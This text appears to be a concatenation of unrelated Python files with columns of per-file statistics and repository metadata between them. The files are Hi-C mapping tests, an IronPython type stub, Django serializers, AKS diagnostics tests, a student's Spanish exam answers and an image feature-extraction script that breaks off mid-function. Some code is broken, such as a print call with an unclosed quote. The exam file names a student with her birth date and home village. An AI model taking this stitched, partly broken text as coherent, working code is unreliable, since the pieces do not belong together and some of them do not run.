with gzip.open(fastq_file_2 + '.gz', 'rb') as fgz_in:
with open(fastq_file_2, 'w') as f_out:
f_out.write(fgz_in.read())
assert os.path.isfile(fastq_file_1) is True
assert os.path.getsize(fastq_file_1) > 0
assert os.path.isfile(fastq_file_2) is True
assert os.path.getsize(fastq_file_2) > 0
@pytest.mark.hic
def test_tb_full_mapping_frag_01():
"""
Test case to ensure that the fragment based full mapping works as expected
for the first paired end
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
fastq_file_1 = resource_path + "tb.Human.SRR1658573_1.fastq"
files = [
gem_file,
fastq_file_1
]
metadata = {
'assembly': 'test',
'enzyme_name': 'MboI',
'windows': None
}
gem_file = files[1]
print(gem_file)
tfm1 = tbFullMappingTool()
tfm1_files, tfm1_meta = tfm1.run(files, [], metadata) # pylint: disable=unused-variable
map_frag = resource_path + "tb.Human.SRR1658573_1_frag.map"
map_full = resource_path + "tb.Human.SRR1658573_1_full.map"
assert os.path.isfile(map_frag) is True
assert os.path.getsize(map_frag) > 0
assert os.path.isfile(map_full) is True
assert os.path.getsize(map_full) > 0
@pytest.mark.hic
def test_tb_full_mapping_frag_02():
"""
Test case to ensure that the fragment based full mapping works as expected
for the second paired end
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
fastq_file_2 = resource_path + "tb.Human.SRR1658573_2.fastq"
files = [
gem_file,
fastq_file_2
]
metadata = {
'assembly': 'test',
'enzyme_name': 'MboI',
'windows': None
}
gem_file = files[1]
print(gem_file)
tfm2 = tbFullMappingTool()
tfm2_files, tfm2_meta = tfm2.run(files, [], metadata) # pylint: disable=unused-variable
map_frag = resource_path + "tb.Human.SRR1658573_2_frag.map"
map_full = resource_path + "tb.Human.SRR1658573_2_full.map"
assert os.path.isfile(map_frag) is True
assert os.path.getsize(map_frag) > 0
assert os.path.isfile(map_full) is True
assert os.path.getsize(map_full) > 0
@pytest.mark.hic
def test_tb_full_mapping_iter_01():
"""
Test case to ensure that the iterative based full mapping works as expected
for the first paired end
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
fastq_file_1 = resource_path + "tb.Human.SRR1658573_1.fastq"
files = [
gem_file,
fastq_file_1
]
metadata = {
'assembly': 'test',
# 'enzyme_name': 'MboI',
'windows': ((1, 25), (1, 50), (1, 75), (1, 100))
}
gem_file = files[1]
print(gem_file)
tfm1 = tbFullMappingTool()
tfm1_files, tfm1_meta = tfm1.run(files, [], metadata) # pylint: disable=unused-variable
map25 = resource_path + "tb.Human.SRR1658573_1_full_1-25.map"
map50 = resource_path + "tb.Human.SRR1658573_1_full_1-50.map"
map75 = resource_path + "tb.Human.SRR1658573_1_full_1-75.map"
map100 = resource_path + "tb.Human.SRR1658573_1_full_1-100.map"
assert os.path.isfile(map25) is True
assert os.path.getsize(map25) > 0
assert os.path.isfile(map50) is True
assert os.path.getsize(map50) > 0
assert os.path.isfile(map75) is True
assert os.path.getsize(map75) > 0
assert os.path.isfile(map100) is True
assert os.path.getsize(map100) > 0
@pytest.mark.hic
def test_tb_full_mapping_iter_02():
"""
Test case to ensure that the iterative based full mapping works as expected
for the second paired end
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
fastq_file_2 = resource_path + "tb.Human.SRR1658573_2.fastq"
files = [
gem_file,
fastq_file_2
]
metadata = {
'assembly': 'test',
# 'enzyme_name': 'MboI',
'windows': ((1, 25), (1, 50), (1, 75), (1, 100))
}
gem_file = files[1]
print(gem_file)
tfm2 = tbFullMappingTool()
tfm2_files, tfm2_meta = tfm2.run(files, [], metadata) # pylint: disable=unused-variable
map25 = resource_path + "tb.Human.SRR1658573_2_full_1-25.map"
map50 = resource_path + "tb.Human.SRR1658573_2_full_1-50.map"
map75 = resource_path + "tb.Human.SRR1658573_2_full_1-75.map"
map100 = resource_path + "tb.Human.SRR1658573_2_full_1-100.map"
assert os.path.isfile(map25) is True
assert os.path.getsize(map25) > 0
assert os.path.isfile(map50) is True
assert os.path.getsize(map50) > 0
assert os.path.isfile(map75) is True
assert os.path.getsize(map75) > 0
assert os.path.isfile(map100) is True
assert os.path.getsize(map100) > 0
| 29.474903
| 92
| 0.667802
| 1,113
| 7,634
| 4.345013
| 0.151842
| 0.052109
| 0.069479
| 0.102151
| 0.766749
| 0.766543
| 0.750414
| 0.740488
| 0.717122
| 0.674318
| 0
| 0.067269
| 0.217186
| 7,634
| 258
| 93
| 29.589147
| 0.741968
| 0.169767
| 0
| 0.592357
| 0
| 0
| 0.175109
| 0.139411
| 0
| 0
| 0
| 0
| 0.178344
| 1
| 0.038217
| false
| 0
| 0.044586
| 0
| 0.082803
| 0.038217
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dec2a1bd593f111e4b4ee1cf51427f800b4678c4
| 2,460
|
py
|
Python
|
stubs.min/System/Windows/Media/__init___parts/Int32CollectionConverter.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | 1
|
2017-07-25T14:30:18.000Z
|
2017-07-25T14:30:18.000Z
|
stubs.min/System/Windows/Media/__init___parts/Int32CollectionConverter.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
stubs.min/System/Windows/Media/__init___parts/Int32CollectionConverter.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
class Int32CollectionConverter(TypeConverter):
"""
Converts an System.Windows.Media.Int32Collection to and from other data types.
Int32CollectionConverter()
"""
def CanConvertFrom(self,*__args):
"""
CanConvertFrom(self: Int32CollectionConverter,context: ITypeDescriptorContext,sourceType: Type) -> bool
Determines if the converter can convert an object of the given type to an
instance of System.Windows.Media.Int32Collection.
context: Describes the context information of a type.
sourceType: The type of the source that is being evaluated for conversion.
Returns: true if the converter can convert the provided type to an instance of
System.Windows.Media.Int32Collection; otherwise,false.
"""
pass
def CanConvertTo(self,*__args):
"""
CanConvertTo(self: Int32CollectionConverter,context: ITypeDescriptorContext,destinationType: Type) -> bool
Determines if the converter can convert an System.Windows.Media.Int32Collection
to a given data type.
context: The context information of a type.
destinationType: The desired type to evaluate the conversion to.
Returns: true if an System.Windows.Media.Int32Collection can convert to destinationType;
otherwise false.
"""
pass
def ConvertFrom(self,*__args):
"""
ConvertFrom(self: Int32CollectionConverter,context: ITypeDescriptorContext,culture: CultureInfo,value: object) -> object
Attempts to convert a specified object to an
System.Windows.Media.Int32Collection instance.
context: Context information used for conversion.
culture: Cultural information that is respected during conversion.
value: The object being converted.
Returns: A new instance of System.Windows.Media.Int32Collection.
"""
pass
def ConvertTo(self,*__args):
"""
ConvertTo(self: Int32CollectionConverter,context: ITypeDescriptorContext,culture: CultureInfo,value: object,destinationType: Type) -> object
Attempts to convert an instance of System.Windows.Media.Int32Collection to a
specified type.
context: Context information used for conversion.
culture: Cultural information that is respected during conversion.
value: System.Windows.Media.Int32Collection to convert.
destinationType: Type being evaluated for conversion.
Returns: A new instance of the destinationType.
"""
pass
| 38.4375
| 144
| 0.731707
| 269
| 2,460
| 6.66171
| 0.249071
| 0.06529
| 0.090402
| 0.165737
| 0.564732
| 0.440848
| 0.343192
| 0.31808
| 0.222098
| 0.116071
| 0
| 0.015291
| 0.202439
| 2,460
| 63
| 145
| 39.047619
| 0.898063
| 0.83252
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
def199b18476835b94c17d541c549120ce3088e7
| 22
|
py
|
Python
|
hej.py
|
TobePo/Exercise2
|
338b00db3c968fb22f3a7b50dc7e7911fb211d3a
|
[
"MIT"
] | null | null | null |
hej.py
|
TobePo/Exercise2
|
338b00db3c968fb22f3a7b50dc7e7911fb211d3a
|
[
"MIT"
] | null | null | null |
hej.py
|
TobePo/Exercise2
|
338b00db3c968fb22f3a7b50dc7e7911fb211d3a
|
[
"MIT"
] | 1
|
2020-03-03T15:30:50.000Z
|
2020-03-03T15:30:50.000Z
|
print('hej)
print('2')
| 11
| 11
| 0.636364
| 4
| 22
| 3.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 0.045455
| 22
| 2
| 12
| 11
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
7244f2898200ec771f82ad9411e85f0feee5f0bb
| 171
|
py
|
Python
|
ex112/teste.py
|
BrianBeyer/pythonExercicios
|
062e2c6a9e6e6f513185f1fb1d4269d8ca1d9e89
|
[
"MIT"
] | null | null | null |
ex112/teste.py
|
BrianBeyer/pythonExercicios
|
062e2c6a9e6e6f513185f1fb1d4269d8ca1d9e89
|
[
"MIT"
] | null | null | null |
ex112/teste.py
|
BrianBeyer/pythonExercicios
|
062e2c6a9e6e6f513185f1fb1d4269d8ca1d9e89
|
[
"MIT"
] | null | null | null |
#112
from ex112.utilidadescev import moeda
from ex112.utilidadescev import dado
p = dado.leiadinheiro(input('Digite o preço: R$'))
moeda.resumo(p,1,2)# ainda nao funciona
| 28.5
| 50
| 0.777778
| 27
| 171
| 4.925926
| 0.740741
| 0.135338
| 0.330827
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072368
| 0.111111
| 171
| 6
| 51
| 28.5
| 0.802632
| 0.128655
| 0
| 0
| 0
| 0
| 0.121622
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
9d0fa6eccc397b7a33c1cc275643484941b4ceb9
| 126
|
py
|
Python
|
refugio/apps/mascota/admin.py
|
sebas095/DjangoCF
|
42c359da6a92a093d17d6b8ca8dd1d2d7a161983
|
[
"MIT"
] | null | null | null |
refugio/apps/mascota/admin.py
|
sebas095/DjangoCF
|
42c359da6a92a093d17d6b8ca8dd1d2d7a161983
|
[
"MIT"
] | null | null | null |
refugio/apps/mascota/admin.py
|
sebas095/DjangoCF
|
42c359da6a92a093d17d6b8ca8dd1d2d7a161983
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Vacuna, Mascota
admin.site.register(Vacuna)
admin.site.register(Mascota)
| 25.2
| 35
| 0.825397
| 18
| 126
| 5.777778
| 0.555556
| 0.173077
| 0.326923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087302
| 126
| 5
| 36
| 25.2
| 0.904348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
19bca054eb26386d70e60cb1f67c135f99cd6fbb
| 2,296
|
py
|
Python
|
database_study_police/users/serializers.py
|
dustyRAIN/Study_Police
|
9605a1e548732be2982abfbe7c66acd492710d23
|
[
"MIT"
] | null | null | null |
database_study_police/users/serializers.py
|
dustyRAIN/Study_Police
|
9605a1e548732be2982abfbe7c66acd492710d23
|
[
"MIT"
] | null | null | null |
database_study_police/users/serializers.py
|
dustyRAIN/Study_Police
|
9605a1e548732be2982abfbe7c66acd492710d23
|
[
"MIT"
] | 1
|
2021-07-25T19:54:02.000Z
|
2021-07-25T19:54:02.000Z
|
from rest_framework import serializers
from . import models
from rest_auth.registration.serializers import RegisterSerializer
class CustomRegisterSerializer(RegisterSerializer):
email = serializers.EmailField(required=True)
password1 = serializers.CharField(write_only=True)
name = serializers.CharField(required=True)
gender = serializers.IntegerField(required=True)
image = serializers.ImageField(required=True)
def get_cleaned_data(self):
super(CustomRegisterSerializer, self).get_cleaned_data()
return {
'username': self.validated_data.get('username', ''),
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', ''),
'name': self.validated_data.get('name', ''),
'gender': self.validated_data.get('gender', ''),
'image': self.validated_data.get('image', ''),
}
class RegisterWOPassSerializer(RegisterSerializer):
email = serializers.EmailField(required=True)
password1 = serializers.CharField(write_only=True)
name = serializers.CharField(required=True)
gender = serializers.IntegerField(required=True)
image = serializers.ImageField(required=True)
def get_cleaned_data(self):
super(RegisterWOPassSerializer, self).get_cleaned_data()
return {
'username': self.validated_data.get('username', ''),
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', ''),
'name': self.validated_data.get('name', ''),
'gender': self.validated_data.get('gender', ''),
'image': self.validated_data.get('image', ''),
}
class CustomUserDetailsSerializer(serializers.ModelSerializer):
class Meta:
model = models.CustomUser
fields = ('id','email','name','gender', 'image')
read_only_fields = ('email',)
class DemoPhotoSerializer(serializers.ModelSerializer):
class Meta:
model = models.DemoPhoto
fields = ['name', 'size', 'image']
class EmailTakenSerializer(serializers.ModelSerializer):
class Meta:
model = models.EmailByProvider
fields = ['email', 'provider']
| 30.613333
| 66
| 0.650261
| 213
| 2,296
| 6.887324
| 0.225352
| 0.106339
| 0.139059
| 0.163599
| 0.723926
| 0.723926
| 0.629857
| 0.629857
| 0.629857
| 0.629857
| 0
| 0.003346
| 0.219077
| 2,296
| 75
| 67
| 30.613333
| 0.814835
| 0
| 0
| 0.604167
| 0
| 0
| 0.087505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0.125
| 0.0625
| 0
| 0.520833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
19c4aadf35a31c39b25e719c43ef6e8548ebb7f0
| 144
|
py
|
Python
|
whatifstocks/stockanalysis/views.py
|
Jaza/whatifstocks
|
59568635284e6d0a45324b6f5e3beb51c965a234
|
[
"Apache-2.0"
] | null | null | null |
whatifstocks/stockanalysis/views.py
|
Jaza/whatifstocks
|
59568635284e6d0a45324b6f5e3beb51c965a234
|
[
"Apache-2.0"
] | null | null | null |
whatifstocks/stockanalysis/views.py
|
Jaza/whatifstocks
|
59568635284e6d0a45324b6f5e3beb51c965a234
|
[
"Apache-2.0"
] | 1
|
2020-04-20T09:20:25.000Z
|
2020-04-20T09:20:25.000Z
|
"""Views related to stockanalysis."""
from flask import Blueprint
blueprint = Blueprint('stockanalysis', __name__, static_folder='../static')
| 24
| 75
| 0.756944
| 15
| 144
| 6.933333
| 0.733333
| 0.346154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 144
| 5
| 76
| 28.8
| 0.806202
| 0.215278
| 0
| 0
| 0
| 0
| 0.205607
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
19fd37bb41ca3364e6bac81e9b764d2e4f657813
| 1,465
|
py
|
Python
|
Examen1.py
|
Sharlycer/SP
|
f337765720d96149b1c70a8be472a8e7198996c5
|
[
"Apache-1.1"
] | null | null | null |
Examen1.py
|
Sharlycer/SP
|
f337765720d96149b1c70a8be472a8e7198996c5
|
[
"Apache-1.1"
] | null | null | null |
Examen1.py
|
Sharlycer/SP
|
f337765720d96149b1c70a8be472a8e7198996c5
|
[
"Apache-1.1"
] | null | null | null |
print("Nombre del alumno; Sharlene Miorzlava Cervantes Vazquez")
print("lugar de residencia: El refugio de Agua zarca")
print("Fecha de Nacimiento: 24 de enero del año 2002")
print("Color favorito: Verde")
print("Animal Favorito: Panda")
print("¿Que es un Programa? Es una serie de instruccionespreviamente codificadas, las cuales permitenrealizar una tarea especifica en una computadora. Ha esta serie de intrucciones previamente codificadas, se les conoce como codigo fuente")
print("¿Por que es importante la programacion? Porque gracias a ella se han desarrollado herramientas y soluciones que le han facilitado la vida al hombre, un claro ejemplo de esto es la comunicacion, tener todo a la mano.")
print("Herencia: Heredar atributos y metodos de otra clase; Jerarquias que presentan la relacion ordenada de las clases que estan relacionadas, reutilizacin de codigos o programas")
print("Poliformismo: Formas y estapas diferentes, es la habilidad de un objeto de realidar una accion de diferentes maneras utilizando metodos igual")
print("Abstraccion: Principio por el cual se descarta toda aquella informacion que no resulta relevante en un contexto en particular, entatizando algunos de las detalles o propiedades de los objetos")
print("Almecenar y orgamizar las caractersticas y funcionalidades de los objetos representadolas por medio de atribulos y metodos; garantiza la integridad de los datos que contiene un objeto, osea que los dotos sean correctos")
| 133.181818
| 240
| 0.812969
| 220
| 1,465
| 5.422727
| 0.627273
| 0.012573
| 0.020117
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004766
| 0.140614
| 1,465
| 11
| 241
| 133.181818
| 0.941223
| 0
| 0
| 0
| 0
| 0.545455
| 0.924966
| 0.016371
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.090909
| 0
| 0.090909
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
df96a125faf89e6ebdfe82941a9290d947e1f32b
| 1,656
|
py
|
Python
|
src/aks-preview/azext_aks_preview/tests/latest/test_aks_diagnostics.py
|
peterbom/azure-cli-extensions
|
c8a0fc8ea8812005fd75017f6797b5ab3dfe8257
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/tests/latest/test_aks_diagnostics.py
|
peterbom/azure-cli-extensions
|
c8a0fc8ea8812005fd75017f6797b5ab3dfe8257
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/tests/latest/test_aks_diagnostics.py
|
peterbom/azure-cli-extensions
|
c8a0fc8ea8812005fd75017f6797b5ab3dfe8257
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
import azext_aks_preview.aks_diagnostics as commands
class TestTrimContainerName(unittest.TestCase):
def test_trim_fqdn_name_containing_hcp(self):
container_name = 'abcdef-dns-ed55ba6d-hcp-centralus-azmk8s-io'
expected_container_name = 'abcdef-dns-ed55ba6d'
trim_container_name = commands._trim_fqdn_name_containing_hcp(container_name)
self.assertEqual(expected_container_name, trim_container_name)
def test_trim_fqdn_name_trailing_dash(self):
container_name = 'dns-ed55ba6ad-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privatelink-centralus-azmk8s-io'
expected_container_name = 'dns-ed55ba6ad-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privatelink'
trim_container_name = commands._trim_fqdn_name_containing_hcp(
container_name)
self.assertEqual(expected_container_name, trim_container_name)
def test_trim_fqdn_name_not_containing_hcp(self):
container_name = 'abcdef-dns-ed55ba6d-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privatelink-centralus-azmk8s-io'
expected_container_name = 'abcdef-dns-ed55ba6d-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privat'
trim_container_name = commands._trim_fqdn_name_containing_hcp(container_name)
self.assertEqual(expected_container_name, trim_container_name)
| 57.103448
| 115
| 0.701087
| 183
| 1,656
| 5.994536
| 0.31694
| 0.213309
| 0.065634
| 0.080219
| 0.770283
| 0.752963
| 0.752963
| 0.752963
| 0.694622
| 0.644485
| 0
| 0.055632
| 0.120773
| 1,656
| 28
| 116
| 59.142857
| 0.697802
| 0.202899
| 0
| 0.263158
| 0
| 0.105263
| 0.271483
| 0.257034
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.157895
| false
| 0
| 0.105263
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dfab4c112be45ea8fed8554ee4fb67d1f1cc85ed
| 14,286
|
py
|
Python
|
result_generator/result_feature_db/index.py
|
shijack/feature_extract
|
2c45750ea42a30a1f0b5cbe305edc4c8ab0461d7
|
[
"MIT"
] | 1
|
2019-12-12T14:24:47.000Z
|
2019-12-12T14:24:47.000Z
|
result_generator/result_feature_db/index.py
|
shijack/feature_extract
|
2c45750ea42a30a1f0b5cbe305edc4c8ab0461d7
|
[
"MIT"
] | null | null | null |
result_generator/result_feature_db/index.py
|
shijack/feature_extract
|
2c45750ea42a30a1f0b5cbe305edc4c8ab0461d7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Author: shijack
import sys
import time
sys.path.append('../../')
import os
from nets import resnet_v2
from net_model.extract_cnn_vgg16 import VGG16_MODIFIED
import h5py
import numpy as np
import tensorflow as tf
from keras.preprocessing import image
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from util import utils
from net_model.extract_cnn_densenet_keras import DenseNETMAX
from z_extend_rmac.rmac import rmac
from z_extend_rmac.get_regions import rmac_regions, get_size_vgg_feat_map
def feature_generator_densenet(file_img, file_feature_output):
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
start_time = time.time()
model = DenseNETMAX()
for i, img_path in enumerate(img_list):
norm_feat = model.extract_feat(img_path)
# dct_feat = np.multiply(np.array(DCT_binaray(img_path)),np.full((1,256),0.01))
# dct_feat = get_dct_feature(img_path)
# dct_feat = DCT_binaray(img_path)
# final_feat = np.append(dct_feat,norm_feat)
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([32,],dtype=np.float32)))
feats.append(norm_feat)
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
# directory for storing extracted features
output = file_feature_output
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_rmac_vgg16(dir_img, file_feature_output, is_split_dir=False):
'''
按照文件夹目录,每个目录生成一个文件夹所有图片特征的集合.bow文件,format:每行一个图片的特征。
:param dir_img:
:param file_feature_output:
:param is_split_dir:
:return:
'''
path = dir_img
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
if is_split_dir:
model = rmac.rmac(20)
for child_dirs in utils.get_dirs_child(path):
img_list = utils.get_all_files_suffix(child_dirs)
start_time = time.time()
feats = []
names = []
for i, img_path in enumerate(img_list):
img = image.load_img(img_path)
# Resize
scale = utils.IMG_SIZE / max(img.size)
new_size = (int(np.ceil(scale * img.size[0])), int(np.ceil(scale * img.size[1])))
# print('Original size: %s, Resized image: %s' % (str(img.size), str(new_size)))
img = img.resize(new_size)
# Mean substraction
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = utils.preprocess_image(x)
# Load RMAC model
Wmap, Hmap = get_size_vgg_feat_map(x.shape[2], x.shape[1])
regions = rmac_regions(Wmap, Hmap, 3)
# Compute RMAC vector
# print('Extracting RMAC from image...')
# print (len(regions))
norm_feat = model.predict([x, np.expand_dims(regions, axis=0)])
norm_feat = norm_feat.reshape((-1,))
img_name = os.path.split(img_path)[1]
final_feat = np.hstack((norm_feat.reshape((-1,)), np.zeros([288, ], dtype=np.float32)))
feats.append(final_feat)
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
feats_6 = feats.astype('float32')
np.savetxt(child_dirs + "/" + child_dirs.split("/")[-1] + '.bow', feats_6, fmt='%f')
end_time = time.time()
print ('the total time cnsumed is %d\n', (end_time - start_time))
else:
feats = []
names = []
start_time = time.time()
model = rmac.rmac(20)
img_list = utils.get_all_files_suffix(dir_img)
for i, img_path in enumerate(img_list):
img = image.load_img(img_path)
# Resize
scale = utils.IMG_SIZE / max(img.size)
new_size = (int(np.ceil(scale * img.size[0])), int(np.ceil(scale * img.size[1])))
# print('Original size: %s, Resized image: %s' % (str(img.size), str(new_size)))
img = img.resize(new_size)
# Mean substraction
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = utils.preprocess_image(x)
# Load RMAC model
Wmap, Hmap = get_size_vgg_feat_map(x.shape[2], x.shape[1])
regions = rmac_regions(Wmap, Hmap, 3)
# Compute RMAC vector
# print('Extracting RMAC from image...')
# print (len(regions))
norm_feat = model.predict([x, np.expand_dims(regions, axis=0)])
norm_feat = norm_feat.reshape((-1,))
img_name = os.path.split(img_path)[1]
final_feat = np.hstack((norm_feat.reshape((-1,)), np.zeros([288, ], dtype=np.float32)))
feats.append(final_feat)
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
output = file_feature_output
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_vae(file_img, file_meta_graph, file_ckpt, file_feature_output):
print os.path.abspath(file_meta_graph)
print file_ckpt
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
start_time = time.time()
with tf.Session() as sess:
saver = tf.train.import_meta_graph(file_meta_graph)
saver.restore(sess, file_ckpt)
graph = tf.get_default_graph()
x_input = graph.get_tensor_by_name('encoder/input_img:0')
latent_feature = graph.get_tensor_by_name('variance/latent_feature:0')
for i, img_path in enumerate(img_list):
img = utils.img_process(img_path)
norm_feat = sess.run(latent_feature, feed_dict={x_input: img})
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([160,],dtype=np.float32)))
feats.append(norm_feat.flatten())
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
output = file_feature_output
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_basenet(file_img, checkpoints_dir, file_feature_output):
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
from tensorflow.contrib import slim
x_input = tf.placeholder(tf.float32, shape=[None, 224, 224, 3], name='input_img')
# latent_mean, latent_stddev = encoder(x_input, train_logical=True, latent_dim=LATENT_DIM)
